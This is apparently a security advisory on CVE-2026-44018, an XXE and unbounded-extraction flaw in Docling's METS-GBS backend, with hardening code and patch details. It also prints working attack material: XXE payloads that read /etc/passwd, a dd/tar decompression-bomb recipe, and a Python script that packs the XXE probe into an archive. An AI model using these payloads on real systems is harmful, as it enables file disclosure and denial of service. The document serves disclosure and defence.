Docling, Unsafe Archive Extraction and XML Parsing, CVE-2026-44018 (Moderate) -DC-Jun2026-205


Intro

CVE-2026-44018 affects Docling’s METS-GBS backend. The vulnerability arises from insecure XML parsing and insufficiently controlled archive extraction. When processing a METS-GBS `.tar.gz` archive, the backend calls `lxml.etree.fromstring()` without disabling entity resolution or DTD loading. An attacker can therefore declare an XML External Entity (XXE) that makes the parser read arbitrary local files, or nest entity definitions to trigger a denial of service through entity expansion.
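The hardened parser configuration can be sketched with lxml directly. This assumes lxml is installed. The three parser options are the ones the 2.91.0 fix is described as using; `SAFE_PARSER`, `parse_untrusted`, and the temporary file standing in for `/etc/passwd` are hypothetical names for illustration, not Docling's code.

```python
import os
import tempfile

from lxml import etree

# Hardened parser: keep entity references unexpanded, never load external
# DTDs, and refuse network access while parsing.
SAFE_PARSER = etree.XMLParser(
    resolve_entities=False,
    load_dtd=False,
    no_network=True,
)


def parse_untrusted(xml_bytes):
    """Parse untrusted XML (hypothetical helper, not Docling's API)."""
    return etree.fromstring(xml_bytes, parser=SAFE_PARSER)


# Stand-in for a sensitive local file such as /etc/passwd.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("TOP-SECRET")
    secret_path = fh.name

payload = (
    "<!DOCTYPE root [\n"
    f'<!ENTITY xxe SYSTEM "file://{secret_path}">\n'
    "]>\n"
    "<root><data>&xxe;</data></root>"
).encode()

try:
    root = parse_untrusted(payload)
    serialized = etree.tostring(root)
finally:
    os.remove(secret_path)

# The entity reference is kept as a node; the file is never inlined.
print(serialized)
```

With `resolve_entities=False` the reference survives as an unexpanded entity node, so serializing the tree yields `&xxe;` rather than the file's contents.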
Additionally, the backend imposes no resource limits during extraction: there is no cap on per-file size, total extracted size, or number of members. A decompression bomb (e.g., a small `.tar.gz` that expands to terabytes of data) can therefore exhaust memory and disk space, and a crafted archive containing thousands of files can consume all available inodes or fill storage.
To exploit the XXE, an attacker includes a `DOCTYPE` declaration in the METS XML file:

```xml
<!DOCTYPE mets:mets [
<!ELEMENT mets:mets ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<mets:mets xmlns:mets="http://www.loc.gov/METS/">
<data>&xxe;</data>
</mets:mets>
```

When `etree.fromstring()` parses this XML, the `&xxe;` entity is resolved and the contents of `/etc/passwd` are inlined into the parsed document. For a decompression bomb, the attacker creates a small `.tar.gz` containing a single 10 GB file of zeros; extracting it writes 10 GB to disk (and consumes comparable memory if the member is read fully into memory), causing resource exhaustion.
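The size asymmetry is easy to check without writing 10 GB. This sketch uses only the standard library and builds the same kind of archive in memory with 10 MiB of zeros; the size and the `build_zero_archive` name are illustrative choices. DEFLATE tops out at roughly 1,000:1, so the 10 GB example would still arrive as an archive of only about 10 MB.

```python
import io
import tarfile

SIZE = 10 * 1024 * 1024  # 10 MiB of zeros, a scaled-down stand-in for 10 GB


def build_zero_archive(size):
    """Return the bytes of a .tar.gz holding one member of `size` zero bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name="bomb.data")
        info.size = size
        tar.addfile(info, io.BytesIO(bytes(size)))
    return buf.getvalue()


archive = build_zero_archive(SIZE)
ratio = SIZE / len(archive)
print(f"compressed: {len(archive):,} bytes, expanded: {SIZE:,} bytes, ratio ~{ratio:.0f}:1")
```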
The lack of validation for the number of archive members allows an archive with 100,000 small files to be extracted, potentially leading to inode exhaustion or performance degradation. Together, these issues can lead to information disclosure, application crashes, or full system denial of service.
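Member count and declared sizes are visible in the tar headers, so an archive can be screened before anything is written to disk. The sketch below uses the standard library `tarfile` module in streaming mode; `inspect_archive`, `make_many_files`, and the 1,000-member default (borrowed from the fix's listed limits) are illustrative assumptions, not Docling's code. Skipping member data in a compressed stream still decompresses it, so this bounds disk use and member count, not CPU time.

```python
import io
import tarfile


def inspect_archive(fileobj, max_members=1000):
    """Count members and sum declared sizes of a .tar.gz without extracting.

    Raises ValueError as soon as more than `max_members` headers are seen.
    """
    count = total = largest = 0
    # "r|gz" treats the input as a forward-only stream: headers are read one
    # at a time and member data is decompressed and discarded, never stored.
    with tarfile.open(fileobj=fileobj, mode="r|gz") as tar:
        for member in tar:
            count += 1
            if count > max_members:
                raise ValueError(f"archive has more than {max_members} members")
            total += member.size
            largest = max(largest, member.size)
    return count, total, largest


def make_many_files(n):
    """Build an in-memory .tar.gz with `n` empty files (test fixture)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for i in range(n):
            tar.addfile(tarfile.TarInfo(name=f"f{i:05d}.txt"))
    buf.seek(0)
    return buf


print(inspect_archive(make_many_files(50)))  # (50, 0, 0)

try:
    inspect_archive(make_many_files(50), max_members=10)
    rejected = False
except ValueError:
    rejected = True
```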
The vulnerability exists in all Docling versions prior to 2.91.0. The fix, released in version 2.91.0, introduces secure XML parser settings, configurable extraction limits, and cumulative size tracking.

DailyCVE Form

Platform: Docling (METS-GBS backend)
Version: < 2.91.0
Vulnerability: XXE, decompression bomb, unbounded archive extraction
Severity: Moderate
Date: 2026-06-02

Prediction: Patch already released

What Undercode Says: Analytics

```bash
# Check Docling version
pip show docling | grep Version

# Exploit simulation: create malicious XXE XML
echo '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' > evil.xml

# Simulate a decompression bomb (creates a 1 GiB file of zeros, then compresses it)
dd if=/dev/zero of=bomb.data bs=1M count=1024
tar -czf bomb.tar.gz bomb.data
rm bomb.data

# Monitor disk and inode usage during extraction (Ctrl+C to stop)
while true; do df -h; df -i; sleep 1; done
```

Exploit

1. XXE File Read

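Place the malicious XML inside the METS-GBS archive. When the archive is processed, the parser resolves the entity and inlines the file's contents into the parsed METS document, from which they may surface in the conversion output.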
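To check whether a particular deployment is affected, the probe document can be packed into a `.tar.gz` with the standard library. The member name `mets.xml` and the helper `build_xxe_test_archive` are hypothetical placeholders: the file layout a METS-GBS archive must follow for Docling to pick up the XML is not described in this advisory.

```python
import io
import os
import tarfile
import tempfile

# Hypothetical member name; the layout Docling expects inside a METS-GBS
# archive is not described in this advisory.
XML_MEMBER = "mets.xml"

XXE_XML = b"""<?xml version="1.0"?>
<!DOCTYPE mets:mets [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<mets:mets xmlns:mets="http://www.loc.gov/METS/">
<data>&xxe;</data>
</mets:mets>
"""


def build_xxe_test_archive(path):
    """Write a .tar.gz holding a single XXE probe document."""
    with tarfile.open(path, mode="w:gz") as tar:
        info = tarfile.TarInfo(name=XML_MEMBER)
        info.size = len(XXE_XML)
        tar.addfile(info, io.BytesIO(XXE_XML))


with tempfile.TemporaryDirectory() as tmp:
    probe = os.path.join(tmp, "xxe_probe.tar.gz")
    build_xxe_test_archive(probe)
    # Read it back to confirm the payload was stored intact.
    with tarfile.open(probe, "r:gz") as tar:
        names = tar.getnames()
        stored = tar.extractfile(XML_MEMBER).read()

print(names)
```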

2. Decompression Bomb

Craft a small `.tar.gz` that expands to a massive file. The backend attempts to extract it, consuming disk space and memory until an OS or quota limit is reached or the system crashes.

3. Unbounded Extraction

Create an archive with thousands of tiny files. The backend extracts all members, possibly exhausting inodes or CPU time.

Protection

  • Upgrade to Docling ≥ 2.91.0. The official fix includes:
      • `resolve_entities=False`, `load_dtd=False`, and `no_network=True` in the XML parser
      • Limits: 300 MB total extraction, 10 MB per file, at most 1,000 members
      • Cumulative size tracking and early termination when a limit is exceeded
  • Workaround: avoid processing untrusted METS-GBS archives; if necessary, pre-validate them in an isolated environment with resource limits.
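A minimal sketch of limit-enforcing extraction in the spirit of the fix, using only the standard library `tarfile` module. The default limits are the figures listed above, read as MiB (an assumption); the function and exception names, the skipping of non-regular members, and the path-containment check are illustrative additions, not Docling's implementation.

```python
import io
import os
import tarfile
import tempfile

# Defaults mirror the limits listed for the fix, reading "MB" as MiB (an
# assumption). The function is a hypothetical sketch, not Docling's code.
MAX_TOTAL_BYTES = 300 * 1024 * 1024
MAX_FILE_BYTES = 10 * 1024 * 1024
MAX_MEMBERS = 1000
CHUNK = 64 * 1024


class ArchiveLimitError(Exception):
    """Raised when an archive exceeds one of the extraction limits."""


def safe_extract(archive_path, dest, max_total=MAX_TOTAL_BYTES,
                 max_file=MAX_FILE_BYTES, max_members=MAX_MEMBERS):
    """Extract regular files from a .tar.gz while enforcing size/count limits.

    Returns the number of bytes written. On error, `dest` may hold partial
    output and should be discarded by the caller.
    """
    dest = os.path.realpath(dest)
    total = 0
    with tarfile.open(archive_path, mode="r|gz") as tar:
        for count, member in enumerate(tar, start=1):
            if count > max_members:
                raise ArchiveLimitError(f"more than {max_members} members")
            if not member.isfile():
                continue  # skip directories, links, and device entries
            if member.size > max_file:
                raise ArchiveLimitError(f"{member.name}: exceeds per-file limit")
            # Extra hardening (not listed for the fix): stay inside dest.
            target = os.path.realpath(os.path.join(dest, member.name))
            if os.path.commonpath([dest, target]) != dest:
                raise ArchiveLimitError(f"{member.name}: escapes destination")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            src = tar.extractfile(member)
            with open(target, "wb") as out:
                while chunk := src.read(CHUNK):
                    # Cumulative tracking: abort as soon as the running total
                    # crosses the limit, before writing the offending chunk.
                    total += len(chunk)
                    if total > max_total:
                        raise ArchiveLimitError("total extracted size exceeds limit")
                    out.write(chunk)
    return total


def make_archive(path, files):
    """Write a .tar.gz from a {name: bytes} mapping (test fixture)."""
    with tarfile.open(path, "w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))


with tempfile.TemporaryDirectory() as tmp:
    ok_path = os.path.join(tmp, "ok.tar.gz")
    make_archive(ok_path, {"a.txt": b"x" * 1000, "sub/b.txt": b"y" * 1000})
    extracted = safe_extract(ok_path, os.path.join(tmp, "out"))

    # Five 1,000-byte files against a 3,000-byte cumulative limit.
    big_path = os.path.join(tmp, "big.tar.gz")
    make_archive(big_path, {f"f{i}.txt": b"z" * 1000 for i in range(5)})
    try:
        safe_extract(big_path, os.path.join(tmp, "out2"), max_total=3000)
        total_limit_hit = False
    except ArchiveLimitError:
        total_limit_hit = True

print(extracted, total_limit_hit)
```

Checking the running total per chunk, rather than trusting a precomputed sum, is what lets extraction stop early: the archive is rejected at the first chunk that crosses the limit instead of after everything has been written.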

Impact

  • Information disclosure – An attacker can read any file readable by the backend process.
  • Denial of service – Entity expansion or decompression bombs exhaust CPU, memory, or disk space, crashing the application or host.
  • Resource exhaustion – Unbounded archive extraction can fill storage or inodes, making the system unusable.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
